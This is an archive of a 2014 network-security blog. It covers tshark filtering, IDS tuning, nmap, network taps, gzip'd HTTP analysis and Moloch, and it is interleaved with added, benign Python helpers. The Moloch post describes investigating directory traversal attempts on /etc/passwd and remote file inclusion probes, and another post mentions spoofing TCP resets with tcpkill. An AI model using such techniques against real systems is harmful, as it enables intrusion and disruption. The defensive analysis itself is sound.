Monday, December 22, 2014

NetSec Tool:Dshell

I was introduced to a nice network forensics tool today called Dshell, written by the U.S. Army Research Lab. Written in Python, it allows dissection of pcaps using decoders, which can be chained together to do multiple analyses of traffic. You can run decode -l to see the list of available decoders, which includes:

dns  - extract and summarize DNS queries/responses (defaults: A,AAAA,CNAME,PTR records)
reservedips  - identify DNS resolutions that fall into reserved ip space
large-flows - display netflows that have at least 1MB transferred
long-flows  - display netflows that have a duration of at least 5 mins
rip-http   - rip files from HTTP traffic
protocols - Identifies non-standard protocols (not tcp, udp or icmp)

and many others..

You can download the source and find which dependencies need to be installed, as well as examples and syntax, at:

Thursday, December 4, 2014

About Those Obvious IDS Filters...

Tuning and filtering your IDS is a necessity to keep from being overwhelmed by false positives, and it's an ongoing process that never ends. New rules are applied, new network segments are stood up, and new services are offered.. it all requires a continual process of tuning. But sometimes that overly obvious filter might not be a good idea.

For example, IDS rules will trigger when they see Base64 encoded content (assuming you have that rule or rules enabled). The reason for that rule is that attackers will often use different encodings to try to obfuscate their attacks. But Base64 is used legitimately on a continual basis, so there may be, actually almost certainly will be, false positives.

You may be tempted to just disable the signature because it causes FP's. I wouldn't recommend that, because there will eventually be malicious content going across your network in Base64 format. Another idea would be to filter out certain sites or content. But think carefully about the full ramifications before you do this.

Here's one I see on a regular basis. Web sites created with the DudaOne Mobile Web Site Creator will contain a Base64 encoded site identifier that looks like this:

SiteType : eval(Base64.decode("J0RVREFPTkUn")),

You could create a content filter that looks for that particular string and use it to filter out packets that contain it. But give it a little more thought: it would ALSO filter out compromised sites containing that string that also have malicious code elsewhere on the page.

By applying that filter, you are in essence saying "I always trust any site that was created using the DudaOne Mobile Website Creator tool and I never want to see alerts from that site." Not really what you were intending to do, was it?

Use filtering judiciously and carefully and after careful thought about what it will actually do. You don't want to accidentally blind your IDS, and yourself, to traffic you need to see.
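As an added illustration (not code from the post), here is the difference in Python between the "obvious" content filter and a per-blob allowlist that suppresses only the exact DudaOne identifier and still surfaces any other Base64 on the same page. The sample page and its second blob are constructed for the example.

```python
import base64
import binascii
import re

# Known-benign Base64 site identifier that the DudaOne site builder embeds
# (the string quoted in the post); it decodes to the text 'DUDAONE'.
DUDAONE_MARKER = "J0RVREFPTkUn"

# Matches every Base64.decode("...") call in a page body.
B64_CALL = re.compile(r'Base64\.decode\("([A-Za-z0-9+/=]+)"\)')


def naive_content_filter(page: str) -> bool:
    """The 'obvious' filter: drop the whole packet when the DudaOne marker is present.

    Returns True when the packet would be hidden from alerting, no matter
    what else it carries.
    """
    return DUDAONE_MARKER in page


def review_base64_blobs(page: str) -> list:
    """Look at each Base64.decode() argument on its own.

    Only the exact, known-benign DudaOne marker is suppressed; every other
    blob is decoded and left for the analyst, so a page built with DudaOne
    that also carries an unexpected blob still raises an alert.
    """
    findings = []
    for match in B64_CALL.finditer(page):
        blob = match.group(1)
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            decoded = None  # not valid Base64 at all; still worth a look
        findings.append({
            "blob": blob,
            "decoded": decoded,
            "suppress": blob == DUDAONE_MARKER,
        })
    return findings


def unsuppressed_blobs(page: str) -> list:
    """Blobs that survive per-blob review and should still alert."""
    return [f for f in review_base64_blobs(page) if not f["suppress"]]


# Constructed sample page: a DudaOne-built page that also carries a second,
# unrelated Base64 blob (built here; it decodes to a harmless label).
UNKNOWN_BLOB = base64.b64encode(b"constructed unknown content").decode()
SAMPLE_PAGE = (
    "<script>\n"
    'SiteType : eval(Base64.decode("J0RVREFPTkUn")),\n'
    'Other : eval(Base64.decode("' + UNKNOWN_BLOB + '")),\n'
    "</script>\n"
)

if __name__ == "__main__":
    print("naive filter drops the packet:", naive_content_filter(SAMPLE_PAGE))
    for f in unsuppressed_blobs(SAMPLE_PAGE):
        print("still needs review:", f["blob"], "->", f["decoded"])
```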

Tuesday, November 11, 2014

MAC Address Lookup

You're working in the command line and need to look up the vendor/manufacturer of a MAC address. Here's one way to do this. Make a request to the site using the --data parameter to dump the content to stdout, like so:

curl --data --url

[{"startHex":"002290000000","endHex":"002290FFFFFF","startDec":"148444807168","endDec":"148461584383","company":"CISCO SYSTEMS, INC.","addressL1":"170 W. TASMAN DRIVE","addressL2":"M\/S SJA-2","addressL3":"SAN JOSE CA 95134-1706","country":"UNITED STATES","type":"MA-L"}]

What if you need to find the MAC address of a host in the first place? tshark will do that..

tshark -n -r packets1.pcap -T fields -e ip.src -e eth.src -Y 'ip.addr =='

To see the IP's and MAC addresses of the hosts your IP communicated with, just add those fields:

tshark -n -r packets1.pcap -T fields -e ip.src -e eth.src -e ip.dst -e eth.dst -Y 'ip.addr =='
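An added example, not from the post: a small Python helper that matches a MAC against the startHex/endHex range of the JSON record above and annotates tshark -T fields output with the vendor. The record is the Cisco entry quoted above, reused as sample data; the tshark lines are constructed.

```python
import re

# Sample record in the format the lookup site returns (the CISCO SYSTEMS entry
# quoted in the post, reused here as test data).
SAMPLE_RECORDS = [
    {"startHex": "002290000000", "endHex": "002290FFFFFF",
     "startDec": "148444807168", "endDec": "148461584383",
     "company": "CISCO SYSTEMS, INC.", "country": "UNITED STATES", "type": "MA-L"},
]


def normalize_mac(mac: str) -> str:
    """Return the MAC as 12 upper-case hex digits, accepting the usual separators
    (00:22:90:ab:cd:ef, 00-22-90-ab-cd-ef, 0022.90ab.cdef)."""
    digits = re.sub(r"[:.\-\s]", "", mac).upper()
    if not re.fullmatch(r"[0-9A-F]{12}", digits):
        raise ValueError("not a MAC address: %r" % mac)
    return digits


def lookup_vendor(mac: str, records=SAMPLE_RECORDS):
    """Match the MAC against each record's startHex..endHex range.

    Range matching, rather than a fixed 3-byte prefix, also covers the
    smaller MA-M and MA-S assignments that do not end on an OUI boundary.
    """
    value = int(normalize_mac(mac), 16)
    for rec in records:
        if int(rec["startHex"], 16) <= value <= int(rec["endHex"], 16):
            return rec["company"]
    return None


def annotate_tshark_fields(text: str, records=SAMPLE_RECORDS):
    """Take the tab-separated output of
    tshark -T fields -e ip.src -e eth.src -e ip.dst -e eth.dst
    and attach a vendor to every MAC seen."""
    rows = []
    for line in text.splitlines():
        cols = line.split("\t")
        if len(cols) != 4:
            continue  # non-IP frame or truncated line
        ip_src, mac_src, ip_dst, mac_dst = cols
        rows.append({
            "ip.src": ip_src, "eth.src": mac_src,
            "src_vendor": lookup_vendor(mac_src, records),
            "ip.dst": ip_dst, "eth.dst": mac_dst,
            "dst_vendor": lookup_vendor(mac_dst, records),
        })
    return rows


# Constructed tshark output: documentation-range IPs, one MAC inside the
# sample record's range and one outside it.
SAMPLE_TSHARK_OUTPUT = (
    "192.0.2.10\t00:22:90:ab:cd:ef\t198.51.100.5\t00:0c:29:12:34:56\n"
    "198.51.100.5\t00:0c:29:12:34:56\t192.0.2.10\t00:22:90:ab:cd:ef\n"
)

if __name__ == "__main__":
    for row in annotate_tshark_fields(SAMPLE_TSHARK_OUTPUT):
        print(row["ip.src"], row["eth.src"], row["src_vendor"] or "unknown")
```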

Wednesday, November 5, 2014

Security Distros

There is a comprehensive list of security distros, both active and retired at:

Fyodor’s SecTools Top 125 is a much better page, in my opinion, for tools.

Wednesday, October 22, 2014

The Power of tshark, Part 3

tshark/Wireshark display filters aren't limited to an exact match. tshark has the powerful ability to find multiple values that match one part of a field. A good example is the http.request.uri field. There is a modifier called "contains" that allows you to search the field for matches in diverse content. In the http.request.uri field, we could use http.request.uri contains "google", allowing us to match on,, safebrowsing, www, mail, news and so forth and domains that contain the word google even if it's part of a longer word, like

tshark -n -r packets1.pcap -Y 'http.request.uri contains "google"'

132   0.026293 -> HTTP 159 CONNECT HTTP/1.1
247   0.048647 -> HTTP 243 CONNECT HTTP/1.1 , NTLMSSP_NEGOTIATE
23956   8.625725 -> HTTP 298 CONNECT HTTP/1.1
28461  11.024309 -> HTTP 273 CONNECT HTTP/1.1
29078  11.308659 -> HTTP 396 CONNECT HTTP/1.0
38350  19.076371 -> HTTP 123 CONNECT HTTP/1.1
38368  19.096608 -> HTTP 207 CONNECT HTTP/1.1 , NTLMSSP_NEGOTIATE
51468  25.387301 -> HTTP 520 GET HTTP/1.1

The Power of tshark, Part 2

To expand on our example looking for ICMP type 3 packets, let's narrow that filter down to one specific type of Destination Unreachable message. If we look at the IANA ICMP parameters list, found here, we see that there are 15 codes that can be set with type 3. Some of the more common ones are code 4, Fragmentation Needed and Don't Fragment was Set; code 7, Destination Host Unknown; and code 10, Communication with Destination Host is Administratively Prohibited. Let's add code 4 to our tshark display filter.

tshark -r packets1.pcap -Y "icmp.type == 3 and icmp.code == 4"
501732 194.413516 -> ICMP 70 Destination unreachable (Fragmentation needed)
507176 196.247873 -> ICMP 70 Destination unreachable (Fragmentation needed)

Our output looks the same, with one difference. We're now seeing only ICMP messages that are type 3 and code 4, instead of all destination unreachables.

We've been using the default fields that tshark displays. But we can specify which fields to see, if we wish. In the case of ICMP there wasn't much reason to, as it is a concise output and shows us just what we need anyway. But when looking at other types of packets, we might want to limit the fields to specific data we need, or we may be looping through a large number of packets and pulling out just certain fields we wish to report on, like the IP addresses that generate a certain HTTP status code or just the IP's that generated traffic to a certain port or host.

tshark -n -r packets1.pcap -Y "tcp.port == 80"

16714   6.578480 -> HTTP 471 HTTP/1.1 200 OK  (text/html)
16715   6.579366 -> TCP 60 3786→80 [ACK] Seq=221 Ack=1846 Win=65071 Len=0
16716   6.579611 -> TCP 60 3786→80 [FIN, ACK] Seq=221 Ack=1846 Win=65071 Len=0
16717   6.580180 -> TCP 62 3787→80 [SYN] Seq=0 Win=65535 Len=0 MSS=1380 SACK_PERM=1
16720   6.582334 -> TCP 1434 [TCP segment of a reassembled PDU]
16721   6.582384 -> TCP 1434 [TCP segment of a reassembled PDU]
16722   6.582828 -> TCP 1434 [TCP segment of a reassembled PDU]
16724   6.583013 -> TCP 1434 [TCP segment of a reassembled PDU]
16725   6.583020 -> TCP 1434 [TCP segment of a reassembled PDU]
16729   6.583194 -> TCP 60 [TCP Window Update] 45932→80 [ACK] Seq=882 Ack=113388 Win=17817 Len=0

To filter this down to only see source IP and port and destination IP and port, we need to tell tshark we want to display only certain fields, using the "-T" parameter. We can specify fields, as well as output types of pdml, ps, psml or text.
After the -T fields param, we'll use the "-e" parameter to specify which fields to display. The Source IP field is "ip.src", the Source Port field is "tcp.srcport" and the destination IP and port are, as expected, "ip.dst" and "tcp.dstport".

So after adding these field selectors, our output is narrowed down to the four fields of interest for this run.

tshark -n -r packets1.pcap -T fields -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -Y "tcp.port == 80"

19248     80   19248     80   80   3743 80   45870    80   36719    80   36719    80   36719   5925 80   5925 80   45870 80

Next post we'll use more display filters to build our custom output and look at tsharks ability to do stats from the command line.

Wednesday, October 15, 2014

The Power of tshark

tshark (the command line version of Wireshark) is a powerful tool for doing network forensics and investigation. For the new intrusion analyst, the GUI may be more comfortable to work in, but as powerful as Wireshark is, it has its limitations. The larger the pcap file, the longer it will take to load into Wireshark, and it's possible to crash the program or even your operating system with too large a file.

Another limitation is getting those pcaps transferred to your analysis machine, especially if the time frame you need to investigate spans multiple files (or hours or days or weeks).

tshark is uniquely suited to parsing through large amounts of packet data, across multiple files, with all the protocol analyzing power of Wireshark AND allowing you to use every one of Wireshark's 174,000+ display fields.

If you've never worked with tshark before, don't worry. You can start out with some very basic tcpdump-like syntax and then add more filtering and/or fields to display as you go along. 

Before you start, I'd suggest bookmarking the Display Filter Reference for Wireshark, found here.
There's an even easier way to discover what filters you want to use by actually using a running instance of Wireshark, but I'll address that later. Let's keep it in the dark spaces for now.

A simple tshark command to show you all packets with an ICMP type of 3 (destination unreachable) would be like this:
tshark -r packets1.pcap -Y "icmp.type == 3"

Simple enough. The -r means read a file in instead of sniffing an interface (the same as tcpdump), packets1.pcap is our already captured packet data file, and -Y means use this display filter, which is "icmp.type == 3". 
And here's a sample of what tshark shows:

501732 194.413516 -> ICMP 70 Destination unreachable (Fragmentation needed)

tshark also shows us the ICMP code at no extra cost. As we can see, the destination unreachable packet was sent because fragmentation was needed but the Don't Fragment flag was set (refer to IANA's ICMP Parameters doc and look up ICMP code 4 for type 3 here).

Had we wanted to see echo requests instead of destination unreachables, we would change the "3" to an 8. Echo replies would be a "0" and so forth.

Now we are seeing all default fields coming back from tshark and using just one filter. But we can specify what fields we'd like to see instead. By using the -T parameter, we can specify what we want tshark to show us: the fields, specified with the -e parameter used in conjunction with -T, pdml output (Packet Details Markup Language), ps for Postscript, psml for Packet Summary Markup Language or text, which is the default if nothing is specified. In the next command we're going to tell tshark we'd like to see ONLY the following fields:

The source IP
The destination IP
The ICMP type
The ICMP code
and only for ICMP packets of type 3, destination unreachable.

tshark -r packets1.pcap -T fields -e ip.src -e ip.dst -e icmp.type -e icmp.code  -Y "icmp.type == 3"

And our output looks like this:

,  ,           3       4,  ,           3       4,,         3       3,  ,           3       3,,     3       3

Now we could create a dataset with all the destination unreachables along with the code, telling us what type of unreachable messages they are from large pcaps of data. A 'for' loop would allow us to iterate through as many pcaps as needed.
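An added example (not the author's code) of that loop in Python, covering this post and Part 2 above: it builds the tshark command the posts use, parses the tab-separated -T fields output, counts type 3 messages per source, destination and code, labels the codes from the IANA registry and emits CSV for a spreadsheet. Only run_over_pcaps assumes tshark is on the PATH; the sample output is constructed.

```python
import csv
import glob
import io
import subprocess
from collections import Counter

# Names for ICMP type 3 codes, from the IANA ICMP Parameters registry.
UNREACHABLE_CODES = {
    0: "Net Unreachable",
    1: "Host Unreachable",
    2: "Protocol Unreachable",
    3: "Port Unreachable",
    4: "Fragmentation Needed and Don't Fragment was Set",
    7: "Destination Host Unknown",
    10: "Communication with Destination Host is Administratively Prohibited",
}

FIELDS = ["ip.src", "ip.dst", "icmp.type", "icmp.code"]


def tshark_command(pcap: str, display_filter: str = "icmp.type == 3"):
    """Build the tshark argv used in the posts (-T fields with one -e per field)."""
    cmd = ["tshark", "-n", "-r", pcap, "-T", "fields"]
    for field in FIELDS:
        cmd += ["-e", field]
    return cmd + ["-Y", display_filter]


def parse_fields_output(text: str):
    """Parse -T fields output (one packet per line, tab-separated) into dicts."""
    rows = []
    for line in text.splitlines():
        cols = line.split("\t")
        if len(cols) != len(FIELDS) or not cols[2]:
            continue  # skip lines with a missing or empty field
        row = dict(zip(FIELDS, cols))
        row["icmp.type"] = int(row["icmp.type"])
        row["icmp.code"] = int(row["icmp.code"])
        rows.append(row)
    return rows


def code_label(code: int) -> str:
    return UNREACHABLE_CODES.get(code, "code %d" % code)


def tabulate(rows):
    """Count (src, dst, code) triples: the dataset the post describes."""
    counts = Counter()
    for row in rows:
        if row["icmp.type"] == 3:
            counts[(row["ip.src"], row["ip.dst"], row["icmp.code"])] += 1
    return counts


def to_csv(counts) -> str:
    """Labelled CSV, ready for a spreadsheet or a plotting tool."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(["src", "dst", "code", "label", "count"])
    for (src, dst, code), n in sorted(counts.items()):
        writer.writerow([src, dst, code, code_label(code), n])
    return buf.getvalue()


def run_over_pcaps(pattern: str):
    """The 'for loop' over pcaps: run tshark (assumed installed) on every match."""
    rows = []
    for pcap in sorted(glob.glob(pattern)):
        out = subprocess.run(tshark_command(pcap), capture_output=True,
                             text=True, check=True)
        rows += parse_fields_output(out.stdout)
    return rows


# Constructed sample of -T fields output (documentation-range IP addresses).
SAMPLE_OUTPUT = (
    "192.0.2.1\t198.51.100.7\t3\t4\n"
    "192.0.2.1\t198.51.100.7\t3\t4\n"
    "192.0.2.9\t198.51.100.7\t3\t3\n"
)

if __name__ == "__main__":
    print(to_csv(tabulate(parse_fields_output(SAMPLE_OUTPUT))))
```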

Next post, we'll use more of the display filters available, add some labeling and get our data ready for importing into a spreadsheet or doing some graphing.

Thursday, October 2, 2014

nmap Run Time Interaction

Even if you've only been in network security a short time, you've probably come across nmap by now, the port scanner written by Fyodor (Gordon Lyon). It's been around a long time and is the de facto standard for reliable and feature rich port scanning.

You may have installed it and played with it or maybe you're now using it in your job duties. nmap is up to version 6.40 and has a whole slew of options including scripting that can do so much more than just return what ports are open on a box.

But once you've carefully consulted the man page and crafted that command to do just what you need and hit Enter, did you know you can still interact with your scan?

nmap has several run time interaction functions that can give you additional insight into your scan. For example, if you omitted verbosity flags (-v or -vv or even -vvv) to show you more of what the program is doing, you can increase the level while the scan is running by hitting the "v" key. Hitting it a second or third time increases the verbosity each time. Too much data? Hitting the capital "v" key will decrease verbosity each time you use it, all the way back down to the original run time level.

If you're having issues with a scan and not getting the right results, you can use the "d" key to turn up the debug level. Like verbosity, each subsequent use of the key increases the level, and using the upper case version moves it back down.

"p" will turn on packet tracing, showing you a tcpdump-like log of each packet. For this one, there's (obviously) only one level and capital "p" will turn it back off.  Your packet trace will look similar to this:

SENT (14.1570s) TCP > S ttl=42 id=54028 iplen=44  seq=2857954232 win=3072
SENT (14.1570s) TCP > S ttl=52 id=48876 iplen=44  seq=2858019769 win=1024
RCVD (14.1570s) TCP > RA ttl=128 id=14308 iplen=40  seq=0 win=0
SENT (14.1600s) TCP > S ttl=53 id=64554 iplen=44  seq=2857954232 win=2048
SENT (14.1600s) TCP > S ttl=41 id=33103 iplen=44  seq=2858019769 win=2048
SENT (14.1600s) TCP > S ttl=37 id=37013 iplen=44  seq=2858019769 win=2048
RCVD (14.1600s) TCP > RA ttl=128 id=14309 iplen=40  seq=0 win=0
SENT (14.1620s) TCP > S ttl=49 id=30436 iplen=44  seq=2858019769 win=2048

Monday, September 29, 2014

DerbyCon 4.0 Wrap Up

Another DerbyCon is over and like the previous ones, it was a great conference. Some of the videos of the talks are already posted on Adrian's (Crenshaw, IronGeek) Youtube channel which you can find here:

Once all the videos are posted you'll find a day by day, hour by hour table on Adrian's website under Hacking Illustrated Videos, found here:

DerbyCon once again came through for Hackers For Charity in a big way, raising over 62 thousand dollars. If you don't know what that's all about, Hackers For Charity is the organization of Johnny Long, a security researcher best known for starting Google Dorks, which are search strings used to do recon of companies and devices through Google. Johnny gave up a lucrative career that included the news channel talk show circuit and numerous books to move, with his family, to Uganda to help the poorest of the poor. You can find out more at their web site at

Wednesday, August 27, 2014

Decompress gzip’d HTTP data from WireShark in Windows (No Linux required)

Here’s the alert with gzip’d data (look at the Content-Encoding header):

1. Pull the packets into WireShark from the IDS:

2. Extract the zip file and open it in WireShark.

3. Right click the first packet and choose the Follow Stream option:

4. Choose the server side of the conversation from the drop down:

5. Click Save As, give it a filename (like data.txt.gz).

6. Go to the directory where you saved the file, and open it with Notepad++ or a similar program.

7. Delete the server header and the blank lines under it, leaving only the compressed content.

8. After saving the file and closing it, right click the file and from the 7-Zip context menu, choose Extract Here. (If you get a “file is broken” error, continue anyway.)

9. Open up the now decompressed file and begin analyzing.

Thursday, August 21, 2014

DerbyCon 4.0 - Family Rootz

I meant to post a reminder to get your DerbyCon tickets sooner rather than later a while back, and just didn't get around to it. If you didn't get yours by now, the con is sold out. Training is sold out as well.

Rooms at the Hyatt, gone. MIGHT be some left at the Marriott; if you have ticks and no room yet, better jump on it or you'll be sleeping in the RV of Doom. =-) There's also a Hampton Inn a couple blocks away. It's September in Louisville; it'll be a nice walk..

Dave and crew MAY release a small number of additional tickets right before the conference starts, so slap a monitor on the tickets page or check the Twitter feed if you got locked out.

If you have tickets, see you in Louisville..

Thursday, August 7, 2014

Free Cyber Security training

If you know of someone who might be interested in making network security a career, SANS is offering free online training, called CyberAces, starting September 1st. It's totally free, and you need not even register unless you'd like to take the quizzes to check on your progress. You can find out more and sign up, if you wish, at this link:

Thursday, July 31, 2014

Tap Types

If you're getting started in NetSec you've probably heard that taps are the preferred method for monitoring traffic over other methods like spanning ports. Taps have some decided advantages. They pass all packets that hit them, including malformed packets and over- and under-sized packets. A monitor port on a switch may drop these packets as undesirable, which from a network standpoint makes sense, but from an NSM (network security monitoring) standpoint that isn't ideal. Maliciously crafted packets are often non-standard or malformed, and the intrusion analyst needs to see those packets. Another disadvantage of SPAN ports is that when the switch approaches oversubscription it will stop copying packets to the monitoring port. That may be the very time your IDS is alerting you of an attack, or would be if it saw the packets. The tap has no such restrictions, nor does it need to. It's not responsible for routing or inspecting packets; it acts as a bump in the wire and passes everything it sees.

What about all those types of taps? What are the differences?

A passive tap sends a copy of the traffic passing through it to its monitoring ports, but does not and cannot interact with it.

An active response tap has the ability to receive packets from the monitoring devices and put that traffic back on the wire. An example of this would be an IPS that terminates connections by sending spoofed reset packets to both ends of a connection, making each end think the other is shutting the conversation down. You can do this manually with tcpkill, which is found in the dsniff suite of network tools.

An aggregation tap takes both network ports and aggregates them onto one monitoring port, reassembling the duplex network stream so that you only need one port on your monitoring device. This also removes the requirement of using channel bonding on your device to see both directions of the network stream.

And finally, a regeneration tap has the ability to send copies of the traffic to multiple monitoring ports, to allow the same traffic to be monitored and analyzed by multiple devices. You might send the traffic to one or more IDS/IPS devices, a packet capture box and a network analyzer used by your infrastructure team.

Tuesday, May 27, 2014

New version of RemNux released

Lenny Zeltser has released the next major version, v5, of REMnux, an Ubuntu based virtual machine specializing in malware analysis. More information is available here.
If you're not familiar with REMnux, it's a distro with a wide assortment of tools for analyzing JavaScript, PDF files, executable binaries and the like and is a great resource for intrusion analysts investigating alerts from your IPS, packet capture devices, logging servers or network based malware tools.

Tuesday, May 13, 2014

Unzip Gzip

New intrusion analysts will find that web traffic is increasingly compressed due to more and more complex sites with lots of multimedia content. You might use wget to pull down a page in your investigation or use something like Spondulas and end up with a file of mostly "garbage", like this one (intentionally shortened).

HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Tue, 27 April 2014 18:44:27 GMT
Content-Type: text/html; charset=UTF-8
Set-Cookie: __cfduid=dda0ed9839b8fbbaadbee565b711a05951400006667162; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/;; HttpOnly
Cache-Control: max-age=10
Expires: Tue, 13 May 2014 18:44:37 GMT
CF-RAY: 12a101e5c86a09ac-ORD
Content-Encoding: gzip
Transfer-Encoding: chunked
Connection: keep-alive


Notice we see the Content-Encoding field tells us gzip compression is in use.

The Moloch packet capture program has a built-in gzip decompressor, but if you don't have a tool that will do this automatically, it's easily accomplished manually. Open the file in vi or some other text editor and remove the HTTP header, blank lines, etc. down to the block of text (which starts with the first caret). Save the file with a .gz extension, or rename it. Then just run gzip with the -d parameter (to decompress) on the filename:
gzip -d
The resulting file should now be unzipped and readable (and no longer have the .gz extension).
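An added Python example, not from this post or the Windows one above, that does the same manual steps programmatically: split off the HTTP header, then decompress. It also undoes chunked transfer-encoding, which the response above advertises and which puts a hex chunk-size line in front of the gzip data, and it reads a truncated stream as far as it goes, so a capture cut short (what an archiver reports as a broken file) still yields its recoverable content. The sample response is constructed.

```python
import gzip
import zlib


def split_http_response(raw: bytes):
    """Split a raw HTTP response into (status line, headers dict, body bytes)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:  # file saved with bare newlines
        head, sep, body = raw.partition(b"\n\n")
    lines = head.decode("latin-1").splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0].strip(), headers, body


def dechunk(body: bytes) -> bytes:
    """Undo chunked transfer-encoding: hex size, CRLF, data, CRLF, ..., 0, CRLF CRLF.
    A capture that stops mid-stream returns whatever chunks were complete."""
    out = bytearray()
    pos = 0
    while True:
        nl = body.find(b"\r\n", pos)
        if nl < 0:
            break
        size_field = body[pos:nl].split(b";")[0].strip()  # drop chunk extensions
        if not size_field:
            break
        size = int(size_field, 16)
        if size == 0:
            break  # last chunk
        out += body[nl + 2:nl + 2 + size]
        pos = nl + 2 + size + 2  # skip the data and its trailing CRLF
    return bytes(out)


def gunzip_lenient(data: bytes) -> bytes:
    """Decompress from the gzip magic (1f 8b, the '^_' seen in vi) onward.
    A streaming decompressor returns what it can from a truncated stream
    instead of failing on a missing trailer."""
    start = data.find(b"\x1f\x8b")
    if start < 0:
        raise ValueError("no gzip header in body")
    return zlib.decompressobj(16 + zlib.MAX_WBITS).decompress(data[start:])


def decode_http_body(raw: bytes) -> bytes:
    """The headers say what to undo, in order: chunking first, then gzip."""
    _, headers, body = split_http_response(raw)
    if "chunked" in headers.get("transfer-encoding", "").lower():
        body = dechunk(body)
    if headers.get("content-encoding", "").lower() == "gzip":
        body = gunzip_lenient(body)
    return body


# Constructed sample: a gzip'd, chunked response with headers like the one above.
PLAIN = b"<html><body>constructed sample page, compressed for this example</body></html>"
_GZ = gzip.compress(PLAIN)
_CUT = len(_GZ) // 2
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: cloudflare-nginx\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"Content-Encoding: gzip\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Connection: keep-alive\r\n\r\n"
    + b"%x\r\n" % _CUT + _GZ[:_CUT] + b"\r\n"
    + b"%x\r\n" % (len(_GZ) - _CUT) + _GZ[_CUT:] + b"\r\n"
    + b"0\r\n\r\n"
)

if __name__ == "__main__":
    print(decode_http_body(SAMPLE_RESPONSE).decode())
```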

Wednesday, May 7, 2014

Resource List

I recently put together a list of resources that a new NetSec/InfoSec associate could use to familiarize himself with some of the subject matter he'll come into contact with. It's by no means exhaustive, even of the bookmarks and articles and media that just I've saved over the years, but I think there's some useful content and thought I'd post it. I'm still in the process of fleshing it out (at which point it'd probably be overload for a new person) but I enjoy organizing study materials and absorbing as much as I can in my limited free time. Comments are welcome if you see something you think is a stinker and even more welcome would be you sharing some of your links to add to the list. Thanks in advance!
(Please remember the target here is someone new to NetSec/InfoSec. A 50 page white paper on optimizing ring buffers would be interesting to others but probably not what you want to lay on the new guy on the team.)

Information Security Resources

Web sites:
Internet Storm Center -
Dark Reading Daily -
InfoSec Island -
Ethical Hacker Magazine -
PaulDotCom Tech Segments -

SecurityTube -
Derbycon(2013) -
Academy Pro -
SourceFire - Chalk Talks  -
DefCon -
BlackHat -
ShmooCon(2014) -
Microsoft (End User) -

Security Terms Glossary -
Network Security Glossary -
Mind Maps -

Talisker Security Wizardry -
Kaspersky Threat Map -
Arbor Networks DDoS Map -
Mailing Lists:
Team Cymru Dragon Newsbytes (Private) -
Full Disclosure -
SANS (all) -

Linux Library -
Learn Linux at -
Linux Documentation -

Open Security Training -
EDX Intro to Linux (starts Aug 1, $2,400.00 class for free) -

Getmon IT Security Podcasts -
ISC Podcasts (SANS Internet Storm Center) -

Vulnerability Information:
SecurityFocus -

TCPDump/Wireshark and General Packet Capturing
TCPDump command fu -
Wireshark Wiki -

Malicious Javascript:

Bruce Schneier -
Anton Chuvakin -
Marcus J. Ranum -
Lance Spitzner -
Snort -
VRT (Vulnerability Research Team of Sourcefire) -
Naked Security (Sophos) -
MalwareBytes -


I queried a group the other day for their favorite resource for new NetSec team members. I received a lot of good feedback, including one person's links to some really nice mind maps he'd made. The first two are unrelated to network security, but after that you'll find mind maps for subjects like crypto, PKI, securing home computers, reviewing wireless networks, PCI and more. The link is here. They are beautifully done and the author, Aman Hardikar, obviously put a lot of time and effort into them. I recommend you take a look at them.

Monday, May 5, 2014

2014 Verizon Data Breach Report

The 2014 edition of the Verizon Data Breach report is out. If you've never read this, it's a fascinating overview of the past year with respect to who was compromised and how.
You can download your copy of the report at
No sign up is required though they do give an option of registering to get advance notification of future editions.

Tuesday, April 1, 2014

DerbyCon 2014

DerbyCon 2014 tickets go on sale April 3rd. If you're going and don't have a reservation at the Hyatt, better get it in soon. Tickets will be sold here:

Monday, March 31, 2014

Malware Pcaps

I came across a page with pcaps of malicious traffic here. They're broken down into three categories: APT, CRIME and METASPLOIT. Good practice for incident response/intrusion analysis. Just email for the password to the zip files. Have fun!

Friday, February 28, 2014

JS Beautifier

There are various tools to help you clean up JavaScript and make it more readable when doing analysis, including the Linux program js-beautify, but there's also a great site called, appropriately enough, Paste in your code, choose your options, including whether or not you want to detect packers and obfuscators, and hit Ctrl-Enter or click the link. Here's some code I pulled from Wireshark..


and here's how the Online JavaScript Beautifier cleaned it up...

Monday, February 24, 2014

SPI View in Moloch

The Moloch packet capture and analysis tool ( has an SPI View tab with expandable views of the data it has indexed in Elasticsearch. The categories are: General, HTTP, DNS, IRC, Certificates, SSH, Socks, Email and SMB. After doing a search in the Sessions tab, when you click on SPI View (or SPI Graph or Connections) the tab is populated initially with your search query. Making use of the index fields in these categories can cut down significantly on your analysis time.

For example, many times you'll need to look at multiple sessions from a source that has launched various attacks on an external host. After searching for the IP of the attacker, you could expand each connection in the Sessions tab to view the response of the server under attack, and this is much faster using Moloch than pulling packets from your pcaps manually. However, SPI View offers a quicker way to get an overview of all of the attacks, which can remove the need to view each connection individually.


We have a large number of alerts from an external host trying a number of different exploits against a server or servers. Our IDS is showing us alerts from the HI_CLIENT_WEBROOT_DIR rule, all ending with either a directory traversal attempt to read /etc/passwd/ or a file inclusion attempt involving to see if remote file inclusion is possible. From the SPI View tab we can enable the URI field under the HTTP category and display the captured URI of every request from the attacker. We know the servers being targeted are Windows based, so we can disregard the directory traversal attempts to /etc/passwd, and we can look at one connection and see that the remote file inclusion attempt results in a 301 Moved Permanently status code. Now, looking at all the URIs, we can see that all the attacks were of the same type, and therefore not successful, without looking at each individual session.

Our other alternative would have been to check one of each type of attack and write them all off en masse as unsuccessful. But without this extra step of analysis and due diligence, we might have missed a different type of attack buried in the noise (this particular session registered over 1,400 connections in Moloch). Some attackers will use a large, noisy flood of attacks they know will not succeed to mask one targeted attack that has a high probability of success, hoping the analyst will either be overwhelmed by the number of alerts or just investigate a few and discard the rest. This can result in missing the singular exploit attempt. Having an intelligent packet capture and analysis tool like Moloch helps mitigate this method.
